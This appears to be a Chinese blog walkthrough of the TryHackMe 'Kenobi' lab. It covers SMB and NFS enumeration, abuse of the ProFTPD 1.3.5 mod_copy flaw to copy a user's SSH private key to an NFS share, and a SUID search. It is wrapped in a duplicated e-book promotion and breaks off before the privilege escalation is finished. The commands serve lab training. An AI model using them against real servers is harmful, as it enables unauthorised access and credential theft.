最全的Linux教程,Linux从入门到精通
======================
-
linux从入门到精通(第2版)
-
Linux系统移植
-
Linux驱动开发入门与实战
-
LINUX 系统移植 第2版
-
Linux开源网络全栈详解 从DPDK到OpenFlow
第一份《Linux从入门到精通》466页
====================
内容简介
====
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。
本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。
需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Task 2 : Enumerating Samba for shares(枚举 Samba 共享)
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。
SMB(Server Messages Block-服务器信息块)协议是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是C/S型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。
SMB协议有两个端口:139和445。
Samba监听端口有:TCP和UDP------tcp端口相对应的服务是smbd服务,其作用是提供对服务器中文件、打印资源的共享访问;udp端口相对应的服务是nmbd服务,其作用是提供基于NetBIOS主机名称的解析。
1、nmap枚举SMB
nmap有一个用于枚举SMB共享的脚本,使用 nmap,我们可以枚举一台机器的SMB 共享
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.104.54
2、匿名连接
使用smbclient命令,可以匿名连接目标机的SMB共享,从而查看共享系统上的文件
smbclient //10.10.104.54/anonymous #不用输密码,直接回车即可
也可以用smbget命令,通过匿名用户递归下载,将整个SMB 共享系统中的文件下载到本地查看
smbget -R smb://10.10.104.54/anonymous
3、查看log.txt
打开共享上的文件。发现了一些有趣的事情。
- 为用户生成 SSH 密钥时为 Kenobi 生成的信息-“Kenobi用户的ssh密钥”-保存在/home/kenobi/.ssh路径下
- 有关 ProFTPD 服务器的信息( 运行FTP服务的用户是 Kenobi)
之前的 nmap 端口扫描将显示端口 111 正在运行 rpcbind 服务。这只是一个将远程过程调用(RPC)程序号转换为通用地址的服务器。当一个RPC服务启动时,它会告诉rpcbind它正在监听的地址以及它准备服务的RPC程序号。
在我们的例子中,端口 111 用于访问网络文件系统。让我们使用 nmap 来枚举它。
4、枚举nfs信息
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.104.54
5、答题
Task 3 : Gain initial access with ProFtpd(使用 ProFtpd 获得初始访问权限)
ProFtpd是一个免费、开源的FTP服务器,兼容Unix和Windows系统。它在过去的软件版本中也存在漏洞。
1、ProFtpd 的版本
由第Task 1 的端口扫描结果可知,目标机上的ProFtpd 的版本是1.3.5,在攻击机上使用netcat连接目标机的ftp服务器也可以获取到ProFtpd的版本信息:
nc 10.10.104.54 21 #目标机的ftp服务运行在21端口上
2、查找ProFTPd漏洞
我们可以使用 searchsploit 来查找特定软件版本的漏洞。
Searchsploit 基本上只是exploit-db.com 的命令行搜索工具。
可以看到,该版本ProFtpd的mod_copy模块中存在漏洞。
mod_copy模块实现了SITE CPFR 和 SITE CPTO 命令(类似于 RNFR 和 RNTO) ,这些命令可以用来将文件/目录从服务器上的一个地方复制到另一个地方,而无需将数据传输到客户端并等待返回(无身份验证),该模块包含在 ProFTPD 1.3.x 的 mod_copy.c 文件中,默认情况下不进行编译。
也就是说:任何未经身份验证的客户机都可以利用SITE CPFR 和 SITE CPTO 命令,将文件从FTP服务器的文件系统的任何位置复制到选定的位置。
由之前的信息我们知道:Kenobi是运行FTP服务的用户、Kenobi用户的ssh密钥保存路径。
现在我们将使用 SITE CPFR 和 SITE CPTO 命令复制Kenobi的ssh私钥,我们将私钥复制到NFS所挂载的目录下,后继我们就能获取到这个私钥文件:
nc 10.10.104.54 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa #将密钥复制到NFS所挂载的/var目录下
然后我们把目标机的/var/tmp 目录挂载到我们的攻击机上:
mkdir /mnt/kenobiNFS
mount 10.10.104.54:/var /mnt/kenobiNFS #此处是目标机ip ! 挂载完成后:目标机/var下的所有文件,都将y映射在在攻击机的/mnt/kenobiNFS目录下
ls -la /mnt/kenobiNFS
3、查看Kenobi 的用户标志
复制Kenobi的ssh私钥到攻击机当前目录,然后ssh登录到 Kenobi 的帐户,查看标志性文件:
4、答题
Task 4 : Privilege Escalation with Path Variable Manipulation(通过路径变量操作进行权限提升)
SUID 位可能很危险,某些二进制文件(例如 passwd)需要以提升的权限运行(因为它会重置系统上的密码),但是其他具有 SUID 位的自定义文件可能会导致各种问题。
1、搜索SUID/SGID类型的文件
要在系统中搜索这些类型的文件,请运行以下命令:
find / -perm -u=s -type f 2>/dev/null
2、执行/usr/bin/menu
找出看起来很不寻常的文件/usr/bin/menu ,并尝试执行它:
最全的Linux教程,Linux从入门到精通
======================
-
linux从入门到精通(第2版)
-
Linux系统移植
-
Linux驱动开发入门与实战
-
LINUX 系统移植 第2版
-
Linux开源网络全栈详解 从DPDK到OpenFlow
第一份《Linux从入门到精通》466页
====================
内容简介
====
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。
本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。
需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
1055
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
